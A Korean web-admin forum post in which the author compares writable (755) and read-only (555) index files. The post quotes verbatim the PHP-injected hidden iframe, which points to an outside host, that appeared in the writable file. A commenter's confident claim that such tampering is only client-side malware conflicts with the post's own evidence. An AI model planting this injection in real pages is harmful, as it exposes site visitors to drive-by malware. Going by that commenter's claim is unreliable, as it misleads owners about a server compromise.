인덱스변조 예방에 대한 실험 정보
인덱스변조 예방에 대한 실험
본문
같은 문제로 한번쯤 고민했을 분들께 참고 하시라고 몇자 적습니다.
-------------------------------------------------------------
언젠가 인덱스에 알수없는 아이프레임이 삽입되 있었고..사이트는 당연히느려졌다.
뭘까...?분명히 admin은 그런적이없는데 말이지...간혹,가는 커뮤니티 게시판에서도 종종 그런문의게시가 올라오고..
그런 게시글에 답변으로 파일권한문제라고 답변을 달아줬지만 이또한 추측일뿐 그래서
실험을 해보기로 했다.
문제점]
index / main 등의 파일명을가진 파일에 아이프레임이나 암호화된스크립트등이 삽입으로인한 인덱스 변조.
실험]
사이트내에 인덱스 두개를 새로만들었다.
하나는 소유자 권한을 쓰기포함(755)
또다른 하나는 권한을 쓰기금지(555)로 두개를 만들고
root에 넣어두었다.
결과]
몇칠후 두개의 파일을 검사해보니 권한755파일에
<?php echo ''; ?><?php echo ''; ?><?php echo '<div style="visibility:hidden"><iframe src="http://directlinke.cn/in.cgi?27" width=100 height=80></iframe></div>'; ?><style type="text/css"> iframe {width:0;height:0;border:0;} </style>
<?php echo ''; ?><?php echo ''; ?><?php echo '
권한555파일에는 삽입안됨.
일단 두고보자...!
또 몇칠후 두개의 파일을 검사해보니 권한755파일에 먼저번 이미삽입된 아이프레임 말고 새로운형태의 엔코딩형태의 스크립트 삽입됨
그러나 권한555파일에는 삽입안됨.
문젠 이 두가지형태모두 클릭율을 유도하기위한 형태임.
이러한 문제는 권한이 자유로운 자유게시판을 통하여 침투하여 사이트루트내의 인덱스나 메인등의 이름을 가진 파일들을 찾아서 소유자권한이 쓰기형태인 파일을 찾아서 원하는 스크립이나 아이프레임을 삽입하는 형태라고 추측됨.
댓글 전체
좋은 해결책이 빨리 나왔으면 좋겟네요~~~
계정내 파일 및 디렉토리 검사
이외라면 서버가 뚫린 것이기 때문에 사실상 미는 수 밖에 없을거라고 봅니다.
저라면 리눅스 재설치하겠습니다.
서버에 있는 index파일을 직접 변조하는게 아니랍니다.
서버에 접속해서 열어보세요. 변조되어 있는지...
인덱스 파일을 불러오는 클라이언트(개인 PC)에 악성코드(바이러스)가 감염되어 그렇습니다.
100% 장담합니다. 공유기(라우터)를 의심해볼 필요도 있다고 보여집니다만....
그전에 악성코드가 삽입되어 보여지는 PC가 범인입니다.
소스를 보시면 자바스크립트입니다.
자바스크립트는 클라이언트에서 실행되는 속성때문에 클라이언트에서 삽입되어져도 원하는 결과를 얻을 수 있기 때문입니다.
만약 PHP 소스를 코드내에 삽입하는것이라면 서버를 크래킹해서 삽입하지 않고는 원하는 결과를 얻을 수 없겠지요.
결론>인덱스 파일에 이상한 코드가 삽입되어 보여지시는 분들께서는 정말 믿을 수 있는 깨끗한 PC에 가서 열어 보십시오. 절대 그런 현상이 나타나지 않을 것입니다. 믿어도 좋습니다.^^
서버 관리자나 개발자가 해결할 문제가 아니군요 -_-;
꼭 공유기를 사용하지 않는 컴퓨터에서 해보셔야합니다.
